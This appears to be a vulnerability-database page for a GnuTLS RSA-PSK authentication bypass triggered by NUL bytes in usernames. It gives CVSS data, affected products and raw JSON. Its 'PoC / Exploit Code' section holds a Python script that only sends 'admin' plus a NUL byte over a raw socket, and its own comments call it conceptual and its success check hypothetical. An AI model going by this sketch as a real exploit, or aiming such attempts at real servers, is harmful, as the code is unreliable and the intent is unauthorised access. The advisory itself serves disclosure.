Security Vulnerability Report
中文
CVE-2026-42010 CVSS 7.1 HIGH

CVE-2026-42010

Published: 2026-05-07 12:16:18
Last Modified: 2026-05-14 23:16:37
Source: [email protected]

Description

A flaw was found in gnutls. Servers configured with RSA-PSK (Rivest–Shamir–Adleman – Pre-Shared Key) wrongfully matched usernames containing a NUL character with truncated usernames. A remote attacker could exploit this by sending a specially crafted username, leading to an authentication bypass. This vulnerability allows an attacker to gain unauthorized access by circumventing the authentication process.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gnu:gnutls:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE
GnuTLS < 3.8.2 (具体受影响版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Conceptual PoC for demonstrating the NUL byte injection in username # Target: A server running vulnerable GnuTLS with RSA-PSK enabled target_ip = "192.168.1.100" target_port = 443 # Malicious username containing a NUL byte # This attempts to match "admin" if the server truncates at NUL malicious_username = b"admin\x00" def send_exploit(): try: # Setup socket connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # In a real exploit, this would involve crafting the specific TLS handshake # records with the ClientKeyExchange message containing the malformed identity. # This is a simplified representation of the data payload. payload = malicious_username print(f"[*] Sending payload to {target_ip}:{target_port}...") s.send(payload) # Wait for response response = s.recv(1024) print("[*] Response received.") if b"Handshake Success" in response: # Hypothetical check print("[+] Authentication bypassed!") else: print("[-] Exploit failed or patched.") s.close() except Exception as e: print(f"Error: {e}") if __name__ == "__main__": send_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42010", "sourceIdentifier": "[email protected]", "published": "2026-05-07T12:16:17.977", "lastModified": "2026-05-14T23:16:36.520", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in gnutls. Servers configured with RSA-PSK (Rivest–Shamir–Adleman – Pre-Shared Key) wrongfully matched usernames containing a NUL character with truncated usernames. A remote attacker could exploit this by sending a specially crafted username, leading to an authentication bypass. This vulnerability allows an attacker to gain unauthorized access by circumventing the authentication process."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-626"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:gnutls:-:*:*:*:*:*:*:*", "matchCriteriaId": "33A22858-21E1-479F-A9C4-AD2EFD059B93"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:*", "matchCriteriaId": "87DEB507-5B64-47D7-9A50-3B87FD1E571F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:13274", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-42010", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467289", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.